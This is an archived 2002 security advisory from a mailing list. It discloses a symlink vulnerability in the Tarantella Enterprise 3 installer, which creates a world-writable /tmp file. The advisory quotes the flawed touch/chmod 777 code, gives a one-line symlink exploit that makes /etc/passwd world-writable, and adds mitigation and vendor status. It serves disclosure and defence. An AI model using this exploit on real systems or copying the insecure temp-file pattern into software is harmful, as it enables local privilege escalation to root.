[UNIX] More Local Root Vulnerabilities during Installation of Tarantella Enterprise

From: support@securiteam.com
Date: 02/20/02

From: support@securiteam.com
To: list@securiteam.com
Date: Wed, 20 Feb 2002 22:45:13 +0100 (CET)

- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  More Local Root Vulnerabilities during Installation of Tarantella
Enterprise

SUMMARY

 <http://www.tarantella.com/> Tarantella Enterprise 3 is a non-intrusive
application/data centralization solution. End users can access enterprise
resources via the web interface. A security vulnerability has been found
in the installation process, which would allow local attackers to change
the permissions of existing files to world writeable.

DETAILS

During installation a "twirling / \ | - " text graphic is displayed. The
program creates a file in /tmp called spinning to determine at what state
the installation is at. The files permissions are changed to read write
execute for all users and groups, removed and recreated during different
stages of the installation. This file creation is vulnerable to a simple
symlink attack.

Problematic Code:
<----snip---->
touch /tmp/spinning >/dev/null 2>&1
chmod 777 /tmp/spinning >/dev/null 2>&1
<----snip---->

Exploit:
There is no race condition here, just create the link.

$ ln -s /etc/passwd /tmp/spinning

Wait until root is done installing.

$ ls -l /etc/passwd
- -rwxrwxrwx 1 root root 1094 Feb 18 22:39 /etc/passwd

Recommendations:
It is recommended that the target system is running in single user mode
before this software is installed.

Vendor status:
The vendor has been notified and plans to fix this in the next release.

ADDITIONAL INFORMATION

The information has been provided by <mailto:lwc@vapid.dhs.org> Larry W.
Cashdollar.

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • Re: Can extra processing threads help in this case?
    ... computers installed in the White House. ... after the installation, hordes of NSA-types descended on the White House to track down the ... This is yet a different form of physical security: the early "smart cards" had encryption ... Bandwidth for connected servers, the path of the data, ...
    (microsoft.public.vc.mfc)
  • Re: lighting---hacked!
    ... the only possible security measure one might take. ... I made to turn off ipchains which we have only been running for about ... Take, in particular, the installation of ipchains, which is what ... >From the GUI interface and what documentation I had ...
    (comp.os.linux.security)
  • Re: Software Distribution Service 3
    ... to a checkpoint prior to that installation. ... to restore prior to the checkpoint before this Windows Update was applied I ... your best bet would be to open a free support incident. ... security updates. ...
    (microsoft.public.windowsupdate)
  • Re: Idea to make package vulnerabilities not matter, along with third party software
    ... but they seem arrogant about security, ... FreeBSD contains such mechanisms, but as memory access ... The server doesn't run a GUI. ... installation won't continue. ...
    (freebsd-questions)
  • Macro security N Custom Maintenance wizard
    ... Then I try to figure out whether it is possible to enforce macro security ... Office Security Settings page of either the Custom Installation Wizard or the ... Custom Maintenance Wizard. ...
    (microsoft.public.office.misc)